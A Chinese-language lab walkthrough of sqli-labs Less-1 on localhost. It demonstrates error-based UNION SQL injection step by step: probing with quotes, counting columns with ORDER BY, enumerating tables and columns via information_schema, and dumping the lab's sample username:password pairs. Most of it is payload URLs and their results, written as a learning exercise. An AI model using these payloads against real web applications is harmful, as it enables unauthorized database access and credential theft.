sql-labs-less1 基于显错的union注入全过程

sql-labs-less1 GET - Error based - Single quotes - String

step0 准备

http://localhost/sqli-labs/Less-1/

HackBar

MySQL

Apache

step1 测试

首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;

payload:	
http://localhost/sqli-labs/Less-1/?id=1 --+

mysql:		
SELECT * FROM users WHERE id='1' LIMIT 0,1

result:		
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' --+

result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

payload:
http://localhost/sqli-labs/Less-1/?id=1‘ and 1=1 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+

result:
none!

结论：所以该网站可能存在sql注入漏洞，接下里用order by 1-99语句查询该数据表的字段数量。

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 2 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+

result:
Unknown column '4' in 'order clause'

结论：所以字段数为3。

payload:
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3--+

result:
Your Login name:Dumb
Your Password:Dumb

这里成功执行，但没有返回union select的结果，这是由于代码只返回第一条结果，所以union select获取的结果没有输出到页面。于是设置id=-1，这样可以显示后者的结果。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3--+

result:
Your Login name:2
Your Password:3

返回的结果为2,3，意味着union select 1,2,3中，2和3的位置可以输入MySQL语句，于是我们尝试在3的位置查询当前数据库名（database()函数）

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,database()--+

result:
Your Login name:2
Your Password:security

数据库名：security

step2 注入

接下来，来说获取表名

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 0,1) --+

result:
Your Login name:2
Your Password:emails

这里可以修改limit 0,1。改为group_concat函数可以获得所有表名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

result:
Your Login name:2
Your Password:emails,referers,uagents,users

这里以users为例，下一步是获取字段名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) --+

result:
Your Login name:2
Your Password:id

这里可以修改limit 0,1。改为group_concat函数可以获得所有字段名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ) --+

result:
Your Login name:2
Your Password:id,username,password

最后爆出用户名和密码

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat(username,':',password)) from security.users ) --+

result:
Your Login name:2
Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4

step3 结论

结论如下：

Dumb Dumb
Angelina I-kill-you
Dummy p@ssword
secure crappy
stupid stupidity
superman genious
batman mob!le
admin admin
admin1 admin1
admin2 admin2
admin3 admin3
dhakkan dumbo
admin4 admin4